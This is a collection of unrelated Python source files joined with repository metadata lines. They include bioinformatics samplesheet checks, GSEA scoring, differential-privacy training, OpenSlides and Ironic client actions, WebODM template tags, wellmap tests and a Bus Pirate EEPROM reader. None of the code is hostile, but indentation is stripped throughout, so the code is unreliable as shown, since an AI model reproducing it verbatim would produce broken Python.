# '_R2_001.fastq.gz'
# 'SampleSheet.csv'
def create_title_file(samplesheet_file_path, output_filename):
"""
Main function to read sample sheet, perform checks
"""
### Read samplesheet as either csv or Excel file ###
try:
samplesheet = pd.read_csv(samplesheet_file_path, sep=",", header=0, dtype=str)
except (xlrd.biffh.XLRDError, pd.io.common.CParserError):
samplesheet = pd.read_excel(samplesheet_file_path, sep=",")
# Remove rows where all elements are missing
samplesheet = samplesheet.dropna(axis=0, how="all")
samplesheet = samplesheet.replace("\n", "", regex=True)
### resolve columns values ###
# Check for duplicate columns
if not samplesheet.equals(samplesheet.loc[:, ~samplesheet.columns.duplicated()]):
raise Exception("Duplicated column headers in samplesheet.")
# Check for required columns
if not set(SAMPLE_SHEET_REQUIRED_COLUMNS) <= set(samplesheet.columns.tolist()):
missing_columns = set(SAMPLE_SHEET_REQUIRED_COLUMNS) ^ set(
samplesheet.columns.tolist()
)
raise Exception(
"SampleSheet is missing the following required columns: {}.".format(
",".join(missing_columns)
)
)
# Check for optional columns
if set(SAMPLE_SHEET_REQUIRED_COLUMNS + SAMPLE_SHEET_OPTIONAL_COLUMNS) < set(
samplesheet.columns.tolist()
):
unrecognized_columns = set(
SAMPLE_SHEET_REQUIRED_COLUMNS + SAMPLE_SHEET_OPTIONAL_COLUMNS
) ^ set(samplesheet.columns.tolist())
print("WARNING: SampleSheet has additional unrecognized columns: {}").format(
",".join(unrecognized_columns)
)
elif set(SAMPLE_SHEET_REQUIRED_COLUMNS + SAMPLE_SHEET_OPTIONAL_COLUMNS) > set(
samplesheet.columns.tolist()
):
missing_columns = set(
SAMPLE_SHEET_REQUIRED_COLUMNS + SAMPLE_SHEET_OPTIONAL_COLUMNS
) ^ set(samplesheet.columns.tolist())
print(
"WARNING: SampleSheet is missing the following optional columns: {}"
).format(",".join(missing_columns))
### resolve row values ###
# Check if required column values are populated for all rows
if not samplesheet.equals(samplesheet.dropna(subset=SAMPLE_SHEET_REQUIRED_COLUMNS)):
raise Exception("Missing values in require columns.")
# Select the explicitly defined columns we want from the samplesheet & rename them
try:
title_file = samplesheet[columns_map_samplesheet.keys()]
except KeyError:
raise Exception("Cannot map sample sheet columns to title file.")
title_file.columns = columns_map_samplesheet.values()
# populate title file barcode column
try:
title_file[TITLE_FILE__BARCODE_ID_COLUMN] = [
barcode_x if barcode_x == barcode_y else barcode_x + "_" + barcode_y
for barcode_x, barcode_y in zip(
samplesheet[SAMPLE_SHEET__BARCODE_ID1_COLUMN],
samplesheet[SAMPLE_SHEET__BARCODE_ID2_COLUMN],
)
]
except (KeyError, ValueError):
raise Exception("Error while populating barcode values in the title file.")
# check for projectID and bait version
def projectid_format(id):
"""
helper function to check project ID and extract bait version.
"""
if PROJECT_NAME.match(id):
try:
return BAIT_SEARCH.findall(id).pop().replace(ASSAY_NAME, "")
except IndexError:
raise Exception(
"Bait version cannot be identified from project/run ID."
)
else:
raise Exception("Project ID is not in the required format.")
# Get bait version from project ID and perform check
title_file[TITLE_FILE__BAIT_VERSION_COLUMN] = title_file[
TITLE_FILE__POOL_COLUMN
].apply(projectid_format)
if len(set(title_file[TITLE_FILE__BAIT_VERSION_COLUMN])) > 1:
raise Exception("Samplesheet contains samples with mutliple bait version.")
if (
not set(title_file[TITLE_FILE__BAIT_VERSION_COLUMN]).pop()
== EXPECTED_BAIT_VERSION
):
raise Exception("Samplesheet bait version does not match the expected value.")
# sample description/class check
if not set(title_file[TITLE_FILE__SAMPLE_CLASS_COLUMN]) <= set(
ALLOWED_SAMPLE_DESCRIPTION
):
raise Exception(
"Unexpected sample description. Only the following sample descritpions are allowed: {}.".format(
",".join(ALLOWED_SAMPLE_DESCRIPTION)
)
)
# split metadata column
try:
title_file[
[
TITLE_FILE__PATIENT_NAME_COLUMN,
TITLE_FILE__ACCESSION_COLUMN,
TITLE_FILE__SEX_COLUMN,
TITLE_FILE__SEQUENCER_COLUMN,
]
] = samplesheet[SAMPLE_SHEET__METADATA_COLUMN].str.split(
METADATA_COLUMN_DELIMETER, expand=True
)[
METADATA_REQUIRED_COLUMNS
]
except (ValueError, KeyError):
raise Exception(
"Operator column values are improperly defined. There should be at least 5 '|' delimited fields in this order: OperatorName|PatientName|Accession|Sex|Sequencer"
)
# SEX column makes sense?
title_file.loc[
title_file[TITLE_FILE__SEX_COLUMN].isin(CONTROL_SAMPLE_SEX),
TITLE_FILE__SEX_COLUMN,
] = FEMALE
if not set(title_file[TITLE_FILE__SEX_COLUMN]) <= set(ALLOWED_SEX):
raise Exception(
"Unrecognized SEX type. Should be one of: {}.".format(
",".join(ALLOWED_SEX + CONTROL_SAMPLE_SEX)
)
)
# Check sequencer columns
if not set(title_file[TITLE_FILE__SEQUENCER_COLUMN]) <= set(ALLOWED_SEQUENCERS):
unrecognized_values = set(title_file[TITLE_FILE__SEQUENCER_COLUMN]) ^ set(
ALLOWED_SEQUENCERS
)
raise Exception(
"Unrecognized sequencer names: {}".format(",".join(unrecognized_values))
)
if len(set(title_file[TITLE_FILE__SEQUENCER_COLUMN])) > 1:
raise Exception(
"Only one unique sequencer name is allowerd per title file. There are: {}".format(
",".join(set(title_file[TITLE_FILE__SEQUENCER_COLUMN]))
)
)
# check sample id and sample name format
def name_check(sampleid):
"""
helper function to validate sample IDs and names.
"""
if any([s1 in sampleid for s1 in DISALLOWED_SAMPLE_ID_CHARACTERS]):
raise Exception(
"Disallowed characters in {}. Ensure that none of the following characters exist: {}".format(
sampleid, DISALLOWED_SAMPLE_ID_CHARACTERS
)
)
title_file[TITLE_FILE__SAMPLE_ID_COLUMN].apply(name_check)
title_file[TITLE_FILE__PATIENT_ID_COLUMN].apply(name_check)
# infer sample type from sample id
try:
title_file[TITLE_FILE__SAMPLE_TYPE_COLUMN] = title_file[
TITLE_FILE__SAMPLE_ID_COLUMN
].str.split(SAMPLE_ID_ALLOWED_DELIMETER).str[SELECT_SPLIT_COLUMN]
except KeyError:
raise Exception(
"Error when interpreting sample type from sample_id. Ensure the sample-id are in the 00000000-X format."
)
# inferred sample type check
def sample_type_check(sample):
if not ALLOWED_SAMPLE_TYPE.match(sample):
raise Exception(
"Unknown sample type {}. Sample type should start with one of: {}".format(
sample, ",".join(ALLOWED_SAMPLE_TYPE_LIST)
)
)
title_file[TITLE_FILE__SAMPLE_TYPE_COLUMN].apply(sample_type_check)
# if not set(title_file[TITLE_FILE__SAMPLE_TYPE_COLUMN]) <= set(ALLOWED_SAMPLE_TYPE):
# raise Exception(
# "Unexpected sample type. Only the following sample types are allowed: {}.".format(
# ",".join(ALLOWED_SAMPLE_TYPE)
# )
# )
# Assign sample type
title_file[TITLE_FILE__SAMPLE_TYPE_COLUMN] = [
PLASMA if PLASMA_SAMPLE_TYPE.match(x) else BUFFY
for x in title_file[TITLE_FILE__SAMPLE_TYPE_COLUMN]
]
# constant columns
title_file[TITLE_FILE__COLLAB_ID_COLUMN] = COLLAB_ID
# Samplesheet does not include this information at the moment
# TODO: DMS can work out a way to fill this info if required.
title_file[TITLE_FILE__POOL_INPUT_COLUMN] = ""
# Trim whitespace
title_file = title_file.apply(lambda x: x.str.strip() if x.dtype == "object" else x)
# Optionally split by lanes
if len(title_file[TITLE_FILE__LANE_COLUMN].unique()) > 1:
duplicate_samples = []
for lane in title_file[TITLE_FILE__LANE_COLUMN].unique():
duplicate_samples.extend(
title_file[title_file[TITLE_FILE__LANE_COLUMN] == lane][
TITLE_FILE__SAMPLE_ID_COLUMN
].tolist()
)
duplicate_samples = list(
filter(lambda x: duplicate_samples.count(x) > 1, duplicate_samples)
)
columns_to_consider = title_file.columns.tolist()
columns_to_consider.remove(TITLE_FILE__LANE_COLUMN)
title_file = title_file.drop_duplicates(subset=columns_to_consider)
title_file[TITLE_FILE__LANE_COLUMN].loc[
title_file[TITLE_FILE__SAMPLE_ID_COLUMN].isin(duplicate_samples)
] = MERGED_LANE_VALUE
title_file = title_file[TITLE_FILE__COLUMN_ORDER]
title_file.to_csv(output_filename, sep="\t", index=False)
else:
title_file = title_file[TITLE_FILE__COLUMN_ORDER]
title_file.to_csv(output_filename, sep="\t", index=False)
########
# Main #
########
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"-i",
"--samplesheet_file_path",
help="Sample Manifest File (e.g. test_samplesheet.xlsx)",
required=True,
)
parser.add_argument(
"-o",
"--output_filename",
help="Desired output title location and name",
required=True,
)
args = parser.parse_args()
create_title_file(args.samplesheet_file_path, args.output_filename)
if __name__ == "__main__":
main()
| 2.34375
| 2
|
fast_torch_dp.py
|
lxuechen/fast-dpsgd
| 0
|
12775638
|
<gh_stars>0
'''
Opacus experiments for all the models
'''
import time
import torch
from torch import nn, optim
import data
from experimental.privacy_utils import autograd_grad_sample
from experimental.privacy_utils.privacy_engine import EfficientPrivacyEngine
from pytorch import get_data, model_dict
import utils
def main(args):
print(args)
assert args.dpsgd
torch.backends.cudnn.benchmark = True
mdict = model_dict.copy()
train_data, train_labels = get_data(args)
model = mdict[args.experiment](vocab_size=args.max_features, batch_size=args.batch_size).cuda()
optimizer = optim.SGD(model.parameters(), lr=args.learning_rate, momentum=0)
loss_function = nn.CrossEntropyLoss(reduction="none") if args.experiment != 'logreg' else nn.BCELoss(
reduction="none")
privacy_engine = EfficientPrivacyEngine(
model,
batch_size=args.batch_size,
sample_size=len(train_data),
alphas=[1 + x / 10.0 for x in range(1, 100)] + list(range(12, 64)),
noise_multiplier=args.sigma,
max_grad_norm=args.max_per_sample_grad_norm,
)
privacy_engine.attach(optimizer)
timings = []
for epoch in range(1, args.epochs + 1):
start = time.perf_counter()
dataloader = data.dataloader(train_data, train_labels, args.batch_size)
for batch_idx, (x, y) in enumerate(dataloader):
x, y = x.cuda(non_blocking=True), y.cuda(non_blocking=True)
outputs = model(x)
loss = loss_function(outputs, y)
autograd_grad_sample.set_hooks_mode(mode="norm")
first_loss = loss.mean(dim=0)
first_loss.backward(retain_graph=True)
autograd_grad_sample.set_hooks_mode(mode="grad")
coef_sample = optimizer.privacy_engine.get_coef_sample()
second_loss = (coef_sample * loss).sum(dim=0)
second_loss.backward()
optimizer.step()
optimizer.zero_grad()
torch.cuda.synchronize()
duration = time.perf_counter() - start
print("Time Taken for Epoch: ", duration)
timings.append(duration)
if args.dpsgd:
epsilon, best_alpha = optimizer.privacy_engine.get_privacy_spent(args.delta)
print(f"Train Epoch: {epoch} \t"
f"(ε = {epsilon}, δ = {args.delta}) for α = {best_alpha}")
else:
print(f"Train Epoch: {epoch}")
if not args.no_save:
utils.save_runtimes(__file__.split('.')[0], args, timings)
else:
print('Not saving!')
print('Done!')
if __name__ == '__main__':
# python fast_torch_dp.py ffnn --dpsgd --batch_size 100000 --dummy_data --epochs 100000
parser = utils.get_parser(model_dict.keys())
parser.add_argument(
"--sigma",
type=float,
default=1.0,
help="Noise multiplier (default 1.0)",
)
parser.add_argument(
"-c",
"--max-per-sample-grad_norm",
type=float,
default=1.0,
help="Clip per-sample gradients to this norm (default 1.0)",
)
parser.add_argument(
"--delta",
type=float,
default=1e-5,
help="Target delta (default: 1e-5)",
)
args = parser.parse_args()
main(args)
| 2.109375
| 2
|
openslides_backend/action/actions/user/reset_password_to_default_temporary.py
|
r-peschke/openslides-backend
| 0
|
12775639
|
from typing import Any, Dict
from ...util.register import register_action
from .check_temporary_mixin import CheckTemporaryMixin
from .reset_password_to_default import UserResetPasswordToDefaultAction
@register_action("user.reset_password_to_default_temporary")
class UserResetPasswordToDefaultTemporaryAction(
CheckTemporaryMixin, UserResetPasswordToDefaultAction
):
"""
Action to reset a password to default of a temporary user.
"""
def update_instance(self, instance: Dict[str, Any]) -> Dict[str, Any]:
"""
Check for temporary user and call super().update_instance().
"""
self.check_for_temporary(instance)
return super().update_instance(instance)
| 2.546875
| 3
|
WebODM-master/app/templatetags/settings.py
|
abhinavsri000/UAVision
| 0
|
12775640
|
<gh_stars>0
import datetime
import logging
from django import template
register = template.Library()
logger = logging.getLogger('app.logger')
@register.simple_tag(takes_context=True)
def settings_image_url(context, image):
try:
img_cache = getattr(context['SETTINGS'], image)
except KeyError:
logger.warning("Cannot get SETTINGS key from context. Something's wrong in settings_image_url.")
return ''
try:
return "/media/" + img_cache.url
except FileNotFoundError:
logger.warning("Cannot get %s, this could mean the image was deleted." % image)
return ''
@register.simple_tag(takes_context=True)
def get_footer(context):
try:
settings = context['SETTINGS']
except KeyError:
logger.warning("Cannot get SETTINGS key from context. The footer will not be displayed.")
return ""
if settings.theme.html_footer == "": return ""
organization = ""
if settings.organization_name != "" and settings.organization_website != "":
organization = "<a href='{}'>{}</a>".format(settings.organization_website, settings.organization_name)
elif settings.organization_name != "":
organization = settings.organization_name
footer = settings.theme.html_footer
footer = footer.replace("{ORGANIZATION}", organization)
footer = footer.replace("{YEAR}", str(datetime.datetime.now().year))
return "<footer>" + \
footer + \
"</footer>"
| 2.203125
| 2
|
tests/test_configdict.py
|
kalekundert/wellmap
| 7
|
12775641
|
#!/usr/bin/env python3
from wellmap import *
def test_empty():
config = configdict({})
assert config.meta == {}
assert config.rows == {}
assert config.irows == {}
assert config.cols == {}
assert config.icols == {}
assert config.wells == {}
assert config.user == {}
def test_user():
config = configdict({'x': 1})
assert config.meta == {}
assert config.rows == {}
assert config.irows == {}
assert config.cols == {}
assert config.icols == {}
assert config.wells == {}
assert config.user == {'x': 1}
def test_meta():
config = configdict({'x': 1, 'meta': {'y': 2}})
assert config.meta == {'y': 2}
assert config.rows == {}
assert config.irows == {}
assert config.cols == {}
assert config.icols == {}
assert config.wells == {}
assert config.user == {'x': 1}
def test_rows():
config = configdict({'x': 1, 'row': {'y': 2}})
assert config.meta == {}
assert config.rows == {'y': 2}
assert config.irows == {}
assert config.cols == {}
assert config.icols == {}
assert config.wells == {}
assert config.user == {'x': 1}
def test_irows():
config = configdict({'x': 1, 'irow': {'y': 2}})
assert config.meta == {}
assert config.rows == {}
assert config.irows == {'y': 2}
assert config.cols == {}
assert config.icols == {}
assert config.wells == {}
assert config.user == {'x': 1}
def test_cols():
config = configdict({'x': 1, 'col': {'y': 2}})
assert config.meta == {}
assert config.rows == {}
assert config.irows == {}
assert config.cols == {'y': 2}
assert config.icols == {}
assert config.wells == {}
assert config.user == {'x': 1}
def test_icols():
config = configdict({'x': 1, 'icol': {'y': 2}})
assert config.meta == {}
assert config.rows == {}
assert config.irows == {}
assert config.cols == {}
assert config.icols == {'y': 2}
assert config.wells == {}
assert config.user == {'x': 1}
def test_wells():
config = configdict({'x': 1, 'well': {'y': 2}})
assert config.meta == {}
assert config.rows == {}
assert config.irows == {}
assert config.cols == {}
assert config.icols == {}
assert config.wells == {'y': 2}
assert config.user == {'x': 1}
def test_getattr():
config = configdict({})
config.meta['x'] = 1; assert config.meta == {'x': 1}
config.rows['x'] = 2; assert config.rows == {'x': 2}
config.irows['x'] = 3; assert config.irows == {'x': 3}
config.cols['x'] = 4; assert config.cols == {'x': 4}
config.icols['x'] = 5; assert config.icols == {'x': 5}
config.wells['x'] = 6; assert config.wells == {'x': 6}
def test_setattr():
config = configdict({})
config.meta = {'x': 1}; assert config['meta']['x'] == 1
config.rows = {'x': 2}; assert config['row']['x'] == 2
config.irows = {'x': 3}; assert config['irow']['x'] == 3
config.cols = {'x': 4}; assert config['col']['x'] == 4
config.icols = {'x': 5}; assert config['icol']['x'] == 5
config.wells = {'x': 6}; assert config['well']['x'] == 6
| 2.46875
| 2
|
test.py
|
jaeyeon-park/trackGitRepo
| 0
|
12775642
|
from trackGits import *
import os
def installTest():
"""
Test installView with install function
"""
global __CONFIG_NAME, __SRC_DIR
conf = os.path.join(__SRC_DIR,__CONFIG_NAME)
if not isInstalled(conf):
installed = installView(conf,installer=install)
if not installed: return False
else: return True
else:
return True
def addTest():
"""
Test addDir function
"""
global __CONFIG_NAME, __SRC_DIR
conf = os.path.join(__SRC_DIR,__CONFIG_NAME)
src = input("dirpath of git project")
addDir(src,conf)
| 2.734375
| 3
|
libgsea/extgsea.py
|
antonybholmes/libgsea
| 0
|
12775643
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 13 14:13:10 2018
@author: antony
"""
import numpy as np
import pandas as pd
import sys
import matplotlib
from matplotlib.colors import Normalize
import matplotlib.pyplot as plt
import matplotlib.transforms as transforms
import libplot
import matplotlib.gridspec as gridspec
# http://arep.med.harvard.edu/N-Regulation/Tolonen2006/GSEA/index.html
class ExtGSEA(object):
def __init__(self, ranked_gene_list, ranked_score, permutations=1000, w=1):
self.__w = w
self.__np = permutations
l = len(ranked_gene_list)
rk = np.concatenate((ranked_gene_list, ranked_gene_list))
rsc = np.concatenate((ranked_score, -ranked_score), axis=0)
ix = np.argsort(rsc)[::-1]
print(np.sort(rsc)[::-1])
pn = np.concatenate((np.ones(l), -np.ones(l)), axis=0)
self.__rk = ranked_gene_list
self.__rs = ranked_score
self.__rkc = rk[ix]
self.__rsc = rsc[ix]
self.__pn = pn[ix]
# Defaults if nothing found
self.__es = -1
self.__nes = -1
self.__pv = -1
self.__ledge = []
self.__bg = {}
self.__gsn1 = 'n1'
self.__gsn2 = 'n2'
self.__run = False
def enrichment_score(self, gs1):
l = len(self.__rk)
hits = np.zeros(l)
for i in range(0, l):
if self.__rk[i] in gs1:
hits[i] = 1
# Compute ES
if self.__w != 1:
score_hit = np.cumsum(np.abs(self.__rs * hits) ** self.__w)
else:
score_hit = np.cumsum(np.abs(self.__rs * hits))
score_hit = score_hit / score_hit[-1]
score_miss = np.cumsum(1 - hits)
score_miss = score_miss / score_miss[-1]
es_all = score_hit - score_miss
es = np.max(es_all) + np.min(es_all)
isen = np.zeros(l)
if es < 0:
ixpk = np.where(es_all == np.min(es_all))[0][0]
isen[ixpk:] = 1
ledge = self.__rk[(isen == 1) & (hits == 1)]
ledge = ledge[::-1]
else:
ixpk = np.where(es_all == np.max(es_all))[0][0]
print(ixpk)
isen[0:(ixpk + 1)] = 1
ledge = self.__rk[(isen == 1) & (hits == 1)]
return es, es_all, hits, ledge
def ext_gsea(self, gs1, gs2, name1='Gene set 1', name2='Gene set 2'):
self.__gs1 = gs1
self.__gs2 = gs2
self.__gsn1 = name1
self.__gsn2 = name2
l = len(self.__rk)
self.__hits1 = np.zeros(l)
self.__hits2 = np.zeros(l)
for i in range(0, l):
if self.__rk[i] in gs1:
self.__hits1[i] = 1
if self.__rk[i] in gs2:
self.__hits2[i] = 1
l = len(self.__rkc)
self.__isgs = np.zeros(l)
for i in range(0, l):
if (self.__pn[i] > 0 and self.__rkc[i] in gs1) or (self.__pn[i] < 0 and self.__rkc[i] in gs2):
self.__isgs[i] = 1
# Compute ES
if self.__w != 1:
self.__score_hit = np.cumsum(np.abs(self.__rsc * self.__isgs) ** self.__w)
else:
self.__score_hit = np.cumsum(np.abs(self.__rsc * self.__isgs))
self.__score_hit = self.__score_hit / self.__score_hit[-1]
self.__score_miss = np.cumsum(1 - self.__isgs)
self.__score_miss = self.__score_miss / self.__score_miss[-1]
self.__es_all = self.__score_hit - self.__score_miss
self.__es = np.max(self.__es_all) + np.min(self.__es_all)
isen = np.zeros(l)
if self.__es < 0:
ixpk = np.where(self.__es_all == np.min(self.__es_all))[0][0]
isen[ixpk:] = 1
self.__ledge = self.__rkc[(isen == 1) & (self.__isgs == 1)]
self.__ledge = self.__ledge[::-1]
else:
ixpk = np.where(self.__es_all == np.max(self.__es_all))[0][0]
isen[0:(ixpk + 1)] = 1
self.__ledge = self.__rkc[(isen == 1) & (self.__isgs == 1)]
if self.__np > 0:
self.__bg['es'] = np.zeros(self.__np)
for i in range(0, self.__np):
self.__bg['isgs'] = self.__isgs[np.random.permutation(l)];
if self.__w != 1:
self.__bg['hit'] = np.cumsum((np.abs(self.__rsc * self.__bg['isgs'])) ** self.__w)
else:
self.__bg['hit'] = np.cumsum(np.abs(self.__rsc * self.__bg['isgs']))
self.__bg['hit'] = self.__bg['hit'] / self.__bg['hit'][-1]
self.__bg['miss'] = np.cumsum(1 - self.__bg['isgs']);
self.__bg['miss'] = self.__bg['miss'] / self.__bg['miss'][-1]
self.__bg['all'] = self.__bg['hit'] - self.__bg['miss'];
self.__bg['es'][i] = max(self.__bg['all']) + min(self.__bg['all']);
if self.__es < 0:
self.__pv = np.sum(self.__bg['es'] <= self.__es) / self.__np
self.__nes = self.__es / np.abs(np.mean(self.__bg['es'][self.__bg['es'] < 0]))
else:
self.__pv = np.sum(self.__bg['es'] >= self.__es) / self.__np
self.__nes = self.__es / np.abs(np.mean(self.__bg['es'][self.__bg['es'] > 0]))
else:
self.__pv = -1
self.__nes = -1
self.__run = True
return self.__es, self.__nes, self.__pv, self.__ledge
@property
def bg(self):
return self.__bg
@property
def score_hit(self):
return self.__score_hit
@property
def isgs(self):
return self.__isgs
@property
def es(self):
return self.__es
@property
def es_all(self):
return self.__es_all
@property
def score_miss(self):
return self.__score_miss
def plot(self, title=None, out=None):
"""
Replot existing GSEA plot to make it better for publications
"""
if not self.__run:
return
libplot.setup()
# output truetype
#plt.rcParams.update({'pdf.fonttype':42,'ps.fonttype':42})
# in most case, we will have mangy plots, so do not display plots
# It's also convinient to run this script on command line.
fig = libplot.new_base_fig(w=10, h=7)
# GSEA Plots
gs = gridspec.GridSpec(16, 1)
x = np.array(list(range(0, len(self.__rk))))
es1, es_all1, hits1, ledge1 = self.enrichment_score(self.__gs1)
es2, es_all2, hits2, ledge2 = self.enrichment_score(self.__gs2)
# Ranked Metric Scores Plot
ix = list(range(0, len(x), 100))
print(ix)
x1 = x[ix]
y1 = self.__rs[ix]
print(hits1)
ax1 = fig.add_subplot(gs[10:])
ax1.fill_between(x1, y1=y1, y2=0, color='#2c5aa0')
ax1.set_ylabel("Ranked list metric", fontsize=14)
ax1.text(.05, .9, self.__gsn1, color='black', horizontalalignment='left', verticalalignment='top',
transform=ax1.transAxes)
ax1.text(.95, .05, self.__gsn2, color='red', horizontalalignment='right', verticalalignment='bottom',
transform=ax1.transAxes)
ax1.spines['top'].set_visible(False)
ax1.spines['right'].set_visible(False)
ax1.set_xlim((0, len(x)))
#
# Hits
#
# gene hits
ax2 = fig.add_subplot(gs[8:9], sharex=ax1)
# the x coords of this transformation are data, and the y coord are axes
trans2 = transforms.blended_transform_factory(ax2.transData, ax2.transAxes)
ax2.vlines(np.where(hits1 == 1)[0], 0, 1, linewidth=.5, transform=trans2, color ='black')
libplot.invisible_axes(ax2)
ax3 = fig.add_subplot(gs[9:10], sharex=ax1)
# the x coords of this transformation are data, and the y coord are axes
trans3 = transforms.blended_transform_factory(ax3.transData, ax3.transAxes)
ax3.vlines(np.where(hits2 == 1)[0], 0, 1, linewidth=.5,transform=trans3, color ='red')
libplot.invisible_axes(ax3)
#
# Enrichment score plot
#
ax4 = fig.add_subplot(gs[:8], sharex=ax1)
# max es
y2 = np.max(es_all1)
x1 = np.where(es_all1 == y2)[0]
print(x1, y2)
ax4.vlines(x1, 0, y2, linewidth=.5, color='grey')
y2 = np.min(es_all2)
x1 = np.where(es_all2 == y2)[0]
print(x1, y2)
ax4.vlines(x1, 0, y2, linewidth=.5, color='grey')
y1 = es_all1
y2 = es_all2
ax4.plot(x, y1, linewidth=3, color ='black')
ax4.plot(x, y2, linewidth=3, color ='red')
ax4.tick_params(axis='both', which='both', color='dimgray')
#ax4.spines['left'].set_color('dimgray')
ax4.spines['bottom'].set_visible(False) #set_color('dimgray')
# the y coords of this transformation are data, and the x coord are axes
trans4 = transforms.blended_transform_factory(ax4.transAxes, ax4.transData)
ax4.hlines(0, 0, 1, linewidth=.5, transform=trans4, color='grey')
ax4.set_ylabel("Enrichment score (ES)", fontsize=14)
ax4.set_xlim(min(x), max(x))
ax4.spines['top'].set_visible(False)
ax4.spines['right'].set_visible(False)
ax4.tick_params(axis='both', which='both', bottom='off', top='off', labelbottom='off', right='off')
ax4.locator_params(axis='y', nbins=5)
# FuncFormatter need two argment, I don't know why. this lambda function used to format yaxis tick labels.
ax4.yaxis.set_major_formatter(plt.FuncFormatter(lambda tick_loc,tick_num : '{:.1f}'.format(tick_loc)) )
if title is not None:
fig.suptitle(title)
fig.tight_layout(pad=2) #rect=[o, o, w, w])
if out is not None:
plt.savefig(out, dpi=600)
| 2.65625
| 3
|
ironicclient/v1/create_resources_shell.py
|
sapcc/python-ironicclient
| 0
|
12775644
|
<reponame>sapcc/python-ironicclient
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from ironicclient.common import cliutils
from ironicclient.v1 import create_resources
@cliutils.arg('resource_files', nargs='+', metavar='<file>', default=[],
help='File (.yaml or .json) containing descriptions of the '
'resources to create. Can be specified multiple times.')
def do_create(cc, args):
"""Create baremetal resources (chassis, nodes, port groups and ports).
The resources may be described in one or more JSON or YAML files. If any
file cannot be validated, no resources are created. An attempt is made to
create all the resources; those that could not be created are skipped
(with a corresponding error message).
"""
create_resources.create_resources(cc, args.resource_files)
| 2.53125
| 3
|
scripts/pyBusPirateLite/MicroWire.py
|
bopopescu/Bus-Pirate-1
| 0
|
12775645
|
#!/usr/bin/env python
# encoding: utf-8
import sys,time
from optparse import OptionParser
from pyBusPirateLite.RAW_WIRE import *
def main():
# First of all parse the command line
parser = OptionParser()
parser.add_option("-c", "--capacity", dest="capacity", help="size of the memory chip.", type="int")
parser.add_option("-o", "--org", dest="org", help="specify the memory organization mode (8 or 16).", type="int")
parser.add_option("-a", "--addr", dest="addr", help="set the starting offset of the read or write procedure.", type="int", default=0)
parser.add_option("-n", "--number", dest="n", help="the number of data elements to read or write.", type="int", default=0)
parser.add_option("-f", "--file", dest="file", help="the input or output file.", metavar="FILE")
parser.add_option("-r", "--read", dest="action", help="read the memory chip.", default="read")
parser.add_option("-w", "--write", dest="action", help="write to the memory chip.")
parser.add_option("-d", "--device", dest="device", help="serial interface where bus pirate is in.[/dev/bus_pirate]", default="/dev/bus_pirate")
parser.add_option("-v", "--verbose", dest="verbose", help="don't be quiet.", action="store_true")
parser.add_option("-m", "--more", dest="more", help="only for testing: read more data elements", type="int", default=0)
(options,args) = parser.parse_args()
if (not options.capacity) or (not options.org) or (not options.file):
parser.print_help()
exit()
# Create an instance of the RAW_WIRE class as we are using the BitBang/RAW_WIRE mode
#rw = RAW_WIRE( '/dev/bus_pirate', 115200 )
rw = RAW_WIRE( options.device, 115200 )
if not rw.BBmode():
print "Can't enter into BitBang mode."
exit()
# We have succesfully activated the BitBang Mode, so we continue with
# the raw-wire mode.
if not rw.enter_rawwire():
print "Can't enable the raw-wire mode."
exit()
# Now we have raw-wire mode enabled, so first configure peripherals
# (Power, PullUps, AUX, CS)
if not rw.raw_cfg_pins( PinCfg.POWER | PinCfg.CS ):
print "Error enabling the internal voltage regulators."
# Configure the raw-wire mode
if not rw.cfg_raw_wire( (RAW_WIRECfg.BIT_ORDER & RAW_WIRE_BIT_ORDER_TYPE.MSB) | (RAW_WIRECfg.WIRES & RAW_WIRE_WIRES_TYPE.THREE) | (RAW_WIRECfg.OUT_TYPE & RAW_WIRE_OUT_TYPE._3V3) ):
print "Error configuring the raw-wire mode."
# Set raw-wire speed
if not rw.set_speed( RAW_WIRESpeed._5KHZ ):
print "Error setting raw-wire speed."
# Open the file for reading or writting
if options.action == "read":
f = file(options.file, "wb")
else:
f = file(options.file, "rb")
# How many elements to read or write?
if options.n != 0:
N = options.n + options.more
else:
N = options.capacity / options.org + options.more
# Opcodes for microwire memory devices
#
# Op Address Data
#Instruction SB Code x8 x16 x8 x16 Comments
# READ 1 10 A8 – A0 A7 – A0 Reads data stored in memory, at specified address
# EWEN 1 00 11XXXXXXX 11XXXXXX Write enable must precede all programming modes
#
# ....
#
if options.action == "read":
# Enable the Chip select signal
rw.CS_High()
rw.bulk_trans(1, [0x6])
rw.bulk_trans(1, [0x0])
# and read the items
if options.verbose:
print "Reading %d elements of %d bits" % (N, options.org)
if options.org == 8:
for i in range(0,N):
byte = rw.read_byte()
f.write(byte)
if options.verbose:
print "%02X" % (ord(byte),) ,
else:
for i in range(0,N):
byte = rw.read_byte()
f.write(byte)
if options.verbose:
print "%02X" % (ord(byte),) ,
byte = rw.read_byte()
f.write(byte)
if options.verbose:
print "%02X" % (ord(byte),) ,
f.close()
rw.CS_Low()
print "Done."
# Reset the bus pirate
rw.resetBP();
if __name__ == '__main__':
main()
| 2.8125
| 3
|
training.py
|
SidRama/Longitudinal-VAE
| 4
|
12775646
|
from torchvision import transforms
from torch.utils.data import DataLoader
from torch.utils.data.sampler import BatchSampler
import numpy as np
import torch
import os
from elbo_functions import deviance_upper_bound, elbo, KL_closed, minibatch_KLD_upper_bound, minibatch_KLD_upper_bound_iter
from model_test import MSE_test_GPapprox, MSE_test
from utils import SubjectSampler, VaryingLengthSubjectSampler, VaryingLengthBatchSampler, HensmanDataLoader
from predict_HealthMNIST import recon_complete_gen, gen_rotated_mnist_plot, variational_complete_gen
from validation import validate
def hensman_training(nnet_model, type_nnet, epochs, dataset, optimiser, type_KL, num_samples, latent_dim, covar_module0,
covar_module1, likelihoods, m, H, zt_list, P, T, varying_T, Q, weight, id_covariate, loss_function,
natural_gradient=False, natural_gradient_lr=0.01, subjects_per_batch=20, memory_dbg=False,
eps=1e-6, results_path=None, validation_dataset=None, generation_dataset=None,
prediction_dataset=None, gp_model=None, csv_file_test_data=None, csv_file_test_label=None,
test_mask_file=None, data_source_path=None):
"""
Perform training with minibatching and Stochastic Variational Inference [Hensman et. al, 2013]. See L-VAE supplementary
materials
:param nnet_model: encoder/decoder neural network model
